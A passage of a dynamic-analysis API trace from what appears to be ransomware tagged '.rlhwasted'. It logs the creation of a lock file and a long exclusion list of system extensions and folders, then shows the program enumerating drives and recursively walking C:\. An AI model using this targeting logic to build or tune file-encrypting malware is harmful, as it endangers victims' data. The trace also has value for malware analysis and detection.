This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d47e6*=0x50, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] StrChrW (lpStart="\\Users\\All Users", wMatch=0x7c) returned 0x0 [0181.661] lstrlenW (lpString="\\Users\\All Users") returned 16 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d47fe*=0x5c, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.661] IStream:Stat (in: This=0x6cd5a0, pstatstg=0x112fe38, grfStatFlag=0x1 | out: pstatstg=0x112fe38) returned 0x0 [0181.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5fc) returned 0x6d5b70 [0181.661] IStream:RemoteSeek (in: This=0x6cd5a0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0181.661] ISequentialStream:RemoteRead (in: This=0x6cd5a0, pv=0x6d5b70, cb=0x5fa, pcbRead=0x0 | out: pv=0x6d5b70*=0x2a, pcbRead=0x0) returned 0x0 [0181.661] IUnknown:Release (This=0x6cd5a0) returned 0x0 [0181.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d46d0 | out: hHeap=0x6b0000) returned 1 [0181.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4eb8 | out: hHeap=0x6b0000) returned 1 [0181.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4610 | out: hHeap=0x6b0000) returned 1 [0181.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d44f0 | out: hHeap=0x6b0000) returned 1 [0181.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ccbe8 | out: hHeap=0x6b0000) returned 1 [0181.662] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0181.662] lstrlenW (lpString="") returned 0 [0181.662] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x6d4a98 [0181.662] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x21) returned 0x6ccbe8 [0181.662] CryptAcquireContextW (in: phProv=0x112fea4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fea4*=0x6d4590) returned 1 [0181.930] CryptGenRandom (in: hProv=0x6d4590, dwLen=0x21, pbBuffer=0x6ccbe8 | out: pbBuffer=0x6ccbe8) returned 1 [0181.930] CryptReleaseContext (hProv=0x6d4590, dwFlags=0x0) returned 1 [0181.930] CreateFileW (lpFileName="C:\\Windows\\TEMP\\lck.log" (normalized: "c:\\windows\\temp\\lck.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0181.930] WriteFile (in: hFile=0xf4, lpBuffer=0x6ccbe8*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x112fec0, lpOverlapped=0x0 | out: lpBuffer=0x6ccbe8*, lpNumberOfBytesWritten=0x112fec0*=0x21, lpOverlapped=0x0) returned 1 [0181.931] SetEndOfFile (hFile=0xf4) returned 1 [0181.931] SetFilePointer (in: hFile=0xf4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0181.932] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ccbe8 | out: hHeap=0x6b0000) returned 1 [0181.932] _wcslwr (in: _String=0x6cd1e0 | out: _String="*") returned="*" [0181.932] _wcslwr (in: _String=0x6d5b70 | out: _String="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0181.932] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0181.932] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6ccbe8 [0181.932] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x6ccbfe | out: lpBuffer="C:\\") returned 0x4 [0181.932] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa) returned 0x6cceb0 [0181.932] lstrlenW (lpString="C:\\") returned 3 [0181.932] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cceb0 | out: hHeap=0x6b0000) returned 1 [0181.932] lstrlenW (lpString="C:\\") returned 3 [0181.932] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.932] lstrlenW (lpString="C:\\") returned 3 [0181.932] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.932] QueryDosDeviceW (in: lpDeviceName="C:", lpTargetPath=0x112fe88, ucchMax=0x18 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x0 [0181.933] lstrlenW (lpString="C:\\") returned 3 [0181.933] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.933] lstrlenW (lpString="C:\\") returned 3 [0181.933] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0181.933] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x44) returned 0x6d4530 [0181.933] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xf8 [0181.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x404895, lpParameter=0x6d4530, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0181.934] StrChrW (lpStart="C:\\", wMatch=0x7c) returned 0x0 [0181.934] lstrlenW (lpString="C:\\") returned 3 [0181.934] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xfffe) returned 0x6d6178 [0181.935] lstrlenW (lpString="*") returned 1 [0181.935] lstrlenW (lpString="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned 765 [0181.935] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x600) returned 0x6d5420 [0181.935] lstrcpyW (in: lpString1=0x6d5424, lpString2="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" | out: lpString1="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.rlhwasted_info|*.rlhwasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0181.935] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x250) returned 0x6d4580 [0181.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75544c92, dwReserved1=0x75544d62, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6d47d8 [0181.935] lstrlenW (lpString="$Recycle.Bin") returned 12 [0181.938] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75544c92, dwReserved1=0x75544d62, cFileName="Boot", cAlternateFileName="")) returned 1 [0181.938] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.938] lstrlenW (lpString="Boot") returned 4 [0181.940] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x75544c92, dwReserved1=0x75544d62, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0181.940] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.940] lstrlenW (lpString="bootmgr") returned 7 [0181.940] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x75544c92, dwReserved1=0x75544d62, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0181.940] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.940] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0181.942] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6bf180 [0181.942] SetEvent (hEvent=0xf8) returned 1 [0181.942] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75544c92, dwReserved1=0x75544d62, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0181.942] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.942] lstrlenW (lpString="Config.Msi") returned 10 [0181.944] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d5a28 [0181.944] FindNextFileW (in: hFindFile=0x6d5a28, lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0181.945] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.945] FindNextFileW (in: hFindFile=0x6d5a28, lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0181.945] FindClose (in: hFindFile=0x6d5a28 | out: hFindFile=0x6d5a28) returned 1 [0181.945] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0181.945] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x75544d62, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0181.945] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.945] lstrlenW (lpString="Documents and Settings") returned 22 [0181.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x6b00c4, ftCreationTime.dwLowDateTime=0x6d5a28, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0181.945] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0181.945] FindNextFileW (in: hFindFile=0x6d47d8, lpFindFileData=0x6d4580 | out: lpFindFileData=0x6d4580*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x75544d62, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0181.945] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.945] lstrlenW (lpString="hiberfil.sys") returned 12 [0181.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d5a28 [0181.946] FindNextFileW (in: hFindFile=0x6d5a28, lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0181.946] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.946] FindNextFileW (in: hFindFile=0x6d5a28, lpFindFileData=0x6e7988 | out: lpFindFileData=0x6e7988*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0181.946] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0181.946] lstrlenW (lpString="All Users") returned 9 [0181.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d5a68 [0182.399] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.580] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.580] FindNextFileW (in: hFindFile=0x6d5a68, lpFindFileData=0x6e8be8 | out: lpFindFileData=0x6e8be8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0183.580] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.580] lstrlenW (lpString="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 40 [0183.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x6eb570 | out: lpFindFileData=0x6eb570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d5aa8 [0183.582] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6eb570 | out: lpFindFileData=0x6eb570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.582] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0183.582] FindNextFileW (in: hFindFile=0x6d5aa8, lpFindFileData=0x6eb570 | out: lpFindFileData=0x6eb570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, 